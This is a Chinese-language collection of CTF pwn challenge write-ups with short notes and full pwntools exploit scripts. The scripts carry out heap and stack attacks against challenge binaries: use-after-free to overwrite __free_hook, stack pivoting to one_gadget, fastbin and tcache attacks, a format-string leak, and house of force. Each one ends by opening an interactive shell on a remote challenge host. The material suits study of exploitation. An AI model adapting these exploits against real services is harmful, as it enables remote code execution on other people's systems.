第一天和第三天直接被爆锤
自己已经尽力了
武汉加油!!!
没看出来是我的
思路就是 UAF：将 0x80 的 chunk 放入 unsorted bin 后，再申请时就会拿 unsorted bin 里面的 chunk，不够就会再次申请 chunk。所以通过 UAF 把新申请到的 chunk 指针指向我们可以写到的 chunk 里面，即可写 free_hook 为 system 拿到 shell。
exp:
#!/usr/bin/python2
from pwn import *
# Target I/O: the commented-out line runs the binary locally; the live line
# connects to the challenge server instead. Exactly one should be active.
#p=process('./gyctf_2020_document')
p=remote('node3.buuoj.cn',28096)
# Symbols come from the local binary and the libc pwntools resolves for it
# (elf.libc); every libc.sym offset used below assumes that libc matches the
# remote one.
elf=ELF('./gyctf_2020_document')
libc=elf.libc
def add(name,sex,information):
    """Drive menu option 1 (add).

    ``name`` and ``sex`` are answered as lines after their prompts;
    ``information`` is sent raw (no trailing newline) after 'information'.
    """
    io = p
    io.sendlineafter(':', '1')
    for prompt, value in (('name', name), ('sex', sex)):
        io.sendlineafter(prompt, value)
    io.sendafter('information', information)
def show(idx):
    """Drive menu option 2 (show) for entry ``idx``; both prompts end in ':'."""
    for answer in ('2', str(idx)):
        p.sendlineafter(':', answer)
def edit(idx,sex,information):
    """Drive menu option 3 (edit) on entry ``idx``.

    The sex prompt ends in '?' and is answered with a line; ``information``
    is sent raw after the 'information' prompt.
    """
    steps = (
        (p.sendlineafter, ':', '3'),
        (p.sendlineafter, ':', str(idx)),
        (p.sendlineafter, '?', sex),
        (p.sendafter, 'information', information),
    )
    for send, prompt, data in steps:
        send(prompt, data)
def delete(idx):
    """Drive menu option 4 (delete) for entry ``idx``."""
    selection = str(idx)
    p.sendlineafter(':', '4')
    p.sendlineafter(':', selection)
# --- exploit sequence: the order of add/delete calls is the logic; do not
# reorder. Python 2 script (str doubles as bytes, see the shebang). ---
add('/bin/sh\x00','W','sh'.ljust(0x70,'\x00'))
add('/bin/sh\x00','Y','/bin/sh\x00'.ljust(0x70,'\x00'))
delete(0)
# Entry 0 is read after it has been freed (the UAF the write-up describes).
show(0)
# Take the 6 bytes ending in 0x7f and widen them to a 64-bit value. The
# constants 88 and 0x10 plus __malloc_hook convert that pointer to the libc
# base; they are specific to the libc this write-up assumes and fail silently
# on another build -- the log line is the only sanity check.
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-88-0x10-libc.sym['__malloc_hook']
log.success('libcbase: '+hex(libcbase))
free_hook=libcbase+libc.sym['__free_hook']
system=libcbase+libc.sym['system']
add('/bin/sh\x00','N','\x15'*0x70)#0
delete(1)
add('/bin/sh\x00','Y','\x16'*0x70)#
# 14 qwords: small constants/zeros with free_hook-0x10 in the third slot; the
# trailing p64(0)*8 pads the payload to the 0x70-byte information size.
payload=p64(0)+p64(0x21)+p64(free_hook-0x10)+p64(0x1)+p64(0)+p64(0x51)+p64(0)*8
edit(0,'Y',payload)
edit(3,'Y',p64(system)+'\x00'*0x68)
# Inline equivalent of delete(2); calling the helper would be clearer.
p.sendlineafter(':','4')
p.sendlineafter(':',str(2))
p.interactive()
就是基本的栈迁移
exp:
from pwn import *
from LibcSearcher import *
# Target I/O: local process line is commented out, remote target is live.
#p=process('./borrowstack')
p=remote('123.56.85.29',3635)
elf=ELF('./borrowstack')
libc=elf.libc
# Fixed addresses taken from the challenge binary (presumably non-PIE).
# pop_rdi is written as gadget+1 -- check the disassembly to confirm the
# intended instruction at that offset.
bss=0x000601080
pop_rdi=0x0400702+1
main=0x400626  # NOTE: assigned but never used below
p.recvuntil('want')
# First stage: 0x58 bytes of filler followed by three qwords; the write-up
# calls this a stack pivot (栈迁移). The exact frame layout is not shown here.
payload='a'*0x58+p64(elf.got['__libc_start_main'])+p64(bss+0x50)+p64(0x00400699)
p.send(payload)
p.recvuntil('!')
# Second stage placed in bss: 0x50 zero bytes, then bss, pop_rdi, read@GOT and
# 0x40065B -- presumably prints read's GOT entry, given the leak parsed next.
bsspayload='\x00'*0x50+p64(bss+0)+p64(pop_rdi)+p64(elf.got['read'])+p64(0x040065B)
p.send(bsspayload)
# 6-byte pointer widened to 8; libc base follows from read's symbol offset.
read=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libcbase=read-libc.sym['read']
# Hard-coded offsets for one specific libc build (index 2 is used); these are
# not portable across libc versions.
o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
log.success('libcbase: '+hex(libcbase))
one_gadget=libcbase+o_g[2]
# system and bin_sh are computed but never used. `.next()` on the search
# iterator is Python 2 only (Python 3 requires next(...)). The LibcSearcher
# import at the top of this script is also unused.
system=libcbase+libc.sym['system']
bin_sh=libcbase+libc.search('/bin/sh').next()
# Fixed pause before the final send -- timing-dependent and therefore fragile.
sleep(0.2)
payload=p64(one_gadget)*2
p.send(payload)
p.recvuntil('!')
#p.recvuntil(':')
#p.send('icqa553481f05a84e6e69ac62bd46aef')
p.interactive()
通过 fastbin 先进后出的性质泄露 flag
from pwn import *
# Target I/O: remote target is live; the local process line is commented out.
p=remote('123.56.85.29',6484)
#p=process('./excited')
elf=ELF('./excited')
# Resolved but never referenced in this script.
libc=elf.libc
def add(size1,ba,size2,na):
    """Drive menu option 1 (add) with two sizes and two payloads.

    Sizes are answered as lines; ``ba`` and ``na`` are sent raw (no trailing
    newline) after their respective prompts.
    """
    line = p.sendlineafter
    raw = p.sendafter
    line(' :', '1')
    line(' : ', str(size1))
    raw('ba : ', ba)
    line(' : ', str(size2))
    raw('na : ', na)
def delete(idx):
    """Drive menu option 3 (delete) for entry ``idx``."""
    for prompt, answer in ((' :', '3'), (' : ', str(idx))):
        p.sendlineafter(prompt, answer)
def show(idx):
    """Drive menu option 4 (show) for entry ``idx``."""
    for prompt, answer in ((' :', '4'), (' : ', str(idx))):
        p.sendlineafter(prompt, answer)
# --- exploit sequence: allocation/free order is the logic; do not reorder ---
add(0x10,'aaaa',0x10,'cccc')
add(0x10,'\x11'*4,0x20,'dddd')
#add(0x68)
delete(1)
delete(0)
# Re-allocate after the two frees; same-size freed chunks come back in reverse
# order of freeing (the LIFO property the write-up relies on).
add(0x20,'\x12'*4,0x20,'dddd')
# Second payload is a fixed address inside the binary, repeated twice
# (presumably non-PIE). show(1) then prints entry 1, which the write-up says
# yields the flag -- not verifiable from this script alone.
add(0x10,'\x12'*4,0x10,p64(0x06020A8)*2)
show(1)
p.interactive()
先用格式化字符串泄露，然后用 fastbin attack 打 malloc_hook
exp:
from pwn import *
# Target I/O: the local process line is commented out, remote target is live.
#p=process('./interested')
p=remote('123.56.85.29',3041)
# libc.sym offsets used below assume this local libc matches the remote one.
elf=ELF('./interested')
libc=elf.libc
def check():
    """Drive menu option 0 (check); sends the choice and nothing else."""
    choice = '0'
    p.sendlineafter(' :', choice)
def add(size1,ost,size2,rst):
    """Drive menu option 1 (add): answer the four prompts in order with
    ``size1``, ``ost``, ``size2`` and ``rst`` (every answer is a line)."""
    answers = ('1', str(size1), ost, str(size2), rst)
    prompts = (' :',) + (' : ',) * 4
    for prompt, answer in zip(prompts, answers):
        p.sendlineafter(prompt, answer)
def edit(idx,ost,rst):
    """Drive menu option 2 (edit) on entry ``idx``, answering the two content
    prompts with ``ost`` and ``rst`` as lines."""
    answers = ('2', str(idx), ost, rst)
    prompts = (' :',) + (' : ',) * 3
    for prompt, answer in zip(prompts, answers):
        p.sendlineafter(prompt, answer)
def delete(idx):
    """Drive menu option 3 (delete) for entry ``idx``."""
    for prompt, answer in ((' :', '3'), (' : ', str(idx))):
        p.sendlineafter(prompt, answer)
def show(idx):
    """Drive menu option 4 (show) for entry ``idx``."""
    for prompt, answer in ((' :', '4'), (' : ', str(idx))):
        p.sendlineafter(prompt, answer)
# Format-string leak: the marker is echoed back followed by the 17th stack
# argument formatted with %p; it is read as exactly 14 chars ("0x" + 12 hex
# digits), so a shorter or longer value would break the parse.
p.recvuntil(':')
p.send('OreOOrereOOreO%17$p')
check()
p.recvuntil('OreOOrereOOreO')
# The 240 and __libc_start_main terms convert the leaked pointer to the libc
# base; both are specific to the libc this write-up assumes.
libcbase=int(p.recv(14),16)-240-libc.sym['__libc_start_main']
# Hard-coded offsets for one libc build (index 3 is used); not portable.
o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
malloc_hook=libcbase+libc.sym['__malloc_hook']
one_gadget=libcbase+o_g[3]
log.success('libcbase: '+hex(libcbase))
# --- heap sequence: order is the logic; do not reorder. show() is defined
# above but never used here. ---
add(0x20,'\x11',0x30,'\x22')
add(0x68,'\x12',0x20,'\x21')
delete(2)
# Entry 2 is written after it was freed (use after free); both fields receive
# the same 8-byte value.
edit(2,p64(malloc_hook-0x23),p64(malloc_hook-0x23))
add(0x68,'doudou',0x68,'a'*19+p64(one_gadget))
# Partial 'add': only the menu choice and the first size are sent; the
# remaining prompts are left to p.interactive().
p.sendlineafter(' :','1')
p.sendlineafter(' : ',str(1))
p.interactive()
远程是 Ubuntu 19，但我是用 Ubuntu 18 打的，两者都会使用 tcache bin。有一个 backdoor 函数会申请一个 0x70 大小的 chunk，和 add 函数一致。首先想到 fastbin attack，然而发现只有一次写的机会，还是要钻进 libc。tcache bin 的机制：假如 fastbin 里面有 chunk、而 tcache bin 又不为满的状态，就会把 chunk 接到 tcache 上面；然后有再申请不会将 fake 的 chunk 代入到 tcache 链表中，然后将值写入。
exp:
from pwn import *
# Target I/O: the LOCAL process line is the live one here; the remote target
# is commented out. The binary must be present as ./pwn for this to run.
p=process('./pwn')
#p=remote('123.56.85.29',4205)
elf=ELF('./pwn')
def add(idx):
    """Drive menu option 1 (add) for slot ``idx``; both prompts end in '?'."""
    for answer in ('1', str(idx)):
        p.sendlineafter('?', answer)
def edit(idx,content):
    """Drive menu option 2 (edit): pick slot ``idx``, then send ``content``
    raw (no prompt is awaited and no newline is appended)."""
    for answer in ('2', str(idx)):
        p.sendlineafter('?', answer)
    p.send(content)
def delete(idx):
    """Drive menu option 3 (delete) for slot ``idx``."""
    for answer in ('3', str(idx)):
        p.sendlineafter('?', answer)
def backd():
    """Drive menu option 6 (the 'backdoor' function the write-up mentions)."""
    choice = '6'
    p.sendlineafter('?', choice)
# --- exploit sequence: allocate slots 0..7, then free them in the same order.
# The order is the logic; do not reorder. ---
for i in range(8):
    add(i)
for i in range(8):
    delete(i)
# Slot 7 is written after it was freed (write after free) with a fixed address
# inside the binary (hard-coded; presumably non-PIE).
edit(7,p64(0x4040ae))
add(8)
backd()
p.interactive()
house of force 记录一下以前好像没用过~~
利用的条件:
1. 自己可以申请的 chunk 无大小限制
2. 能够得到 libc 地址、堆地址
3. 有堆溢出的漏洞（能够改写 top chunk）
如果我们申请的 chunk 过大，就会调用 mmap 申请（这里 chunk 结构 AMP 中的 M），这样申请到的地址相对于 libc 基址是不变的。我们将 top 改写到最大（改到要比你申请堆块的大小要大），然后再申请时 top 指针会更新，即可 write-anything-anywhere。
exp:
from pwn import *
# Target I/O: the LOCAL process line is live; the remote target is commented
# out. libc.sym offsets below therefore refer to the local libc.
p=process('./pwn')
#p=remote('node3.buuoj.cn',28302)
elf=ELF('./pwn')
libc=elf.libc
def add(size,content):
    """Drive menu option 1 (add) and return the address the program prints.

    Requests ``size`` bytes, reads the 14 characters printed after
    'bin addr ' (expected to be "0x" + 12 hex digits) and parses them as an
    int, then sends ``content`` raw after the 'content' prompt.
    """
    p.sendlineafter('puts', '1')
    p.sendlineafter('size', str(size))
    p.recvuntil('bin addr ')
    parsed_addr = int(p.recv(14), 16)
    p.sendafter('content', content)
    return parsed_addr
def show():
    """Drive menu option 2 (show); this menu takes no index."""
    choice = '2'
    p.sendlineafter('puts', choice)
# Small logging helper; PEP 8 prefers a def over a named lambda.
lg=lambda addr,data:log.success('%s'%(addr)+hex(data))
# A 20,000,000-byte request is served by mmap rather than the brk heap (the M
# flag the write-up mentions); its address anchors the libc base. The
# 0x1312ff0 distance is specific to this environment and not portable.
heap_mmap=add(20000000,'doudou')
libcbase=heap_mmap+0x1312ff0
malloc_hook=libcbase+libc.sym['__malloc_hook']
# Hard-coded gadget offset for one particular libc build.
one_gadget=libcbase+0x4526a
realloc=libcbase+libc.sym['__libc_realloc']
lg('heap_mmap',heap_mmap)
lg('libcbase: ',libcbase)
# 0x10 bytes fill the requested size; the 16 bytes after them overflow the
# chunk (the heap overflow listed as precondition 3). Per the write-up the
# final qword sets the top chunk size to its maximum.
heap_addr=add(0x10,'a'*0x10+p64(0)+p64(0xffffffffffffffff))-0x10
top_addr=heap_addr+0x20
lg('top_addr: ',top_addr)
# Computed but never used below -- dead code or a leftover from a variant.
offset=malloc_hook-top_addr-0x30
add(10,'aaaa')
add(0x10,p64(0)+p64(one_gadget)+p64(realloc+4))
show()
# Partial 'add': only the menu choice and the size are sent here.
p.sendlineafter('puts','1')
p.sendlineafter('size',str(1))
p.interactive()